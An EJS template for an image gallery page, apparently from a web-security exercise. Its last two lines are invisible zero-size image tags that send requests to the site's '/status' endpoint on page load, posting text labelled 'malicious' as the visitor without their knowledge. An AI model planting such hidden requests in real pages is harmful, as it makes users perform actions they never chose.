<!DOCTYPE html>
<html>

<head>
    <%- include ("../partials/header.ejs") %>
</head>
<body class="bg-secondary">
    <%- include ("../partials/nav.ejs") %>
    <div class='container align-items-center text-center'>
        <div class="row">
            <div class="col-lg-4 col-md-12 mb-4 mb-lg-0">
                <img src="https://www.care.com/c/wp-content/uploads/sites/2/2021/04/nicolef455-202117012317648905-1080x1080.png"
                    class="w-100 shadow-1-strong rounded mb-4" />

                <img src="https://external-preview.redd.it/dGRQVFt1qIHMXGYYOF4_w3Pe80kPsOoO3NJCu7KgItc.jpg?width=640&crop=smart&auto=webp&s=9235d3ac1d99d907c9aa96f7f286fe8332b3c0f7"
                    class="w-100 shadow-1-strong rounded mb-4" />
            </div>

            <div class="col-lg-4 mb-4 mb-lg-0">
                <img src="https://preview.redd.it/mjca07eure971.png?width=640&crop=smart&auto=webp&s=673bc0f7c703abb10c04b7b4748dbc35d87a80c9"
                    class="w-100 shadow-1-strong rounded mb-4" />
                    <img src="https://i.redd.it/fc0sgcycgz481.png"
                    class="w-100 shadow-1-strong rounded mb-4" />
            </div>

            <div class="col-lg-4 mb-4 mb-lg-0">
                <img src="https://preview.redd.it/ersvbo5mvq481.jpg?width=640&crop=smart&auto=webp&s=177f856763565c461ea685983504509ecf5c10d5"
                    class="w-100 shadow-1-strong rounded mb-4" />
            </div>
        </div>
        
        <img height="0" width="0" src="/status?status=Maliciozni tekst haha">
        <img height="0" width="0" src="/status?status=Jos malo teksta">

    </div>
</body>

</html>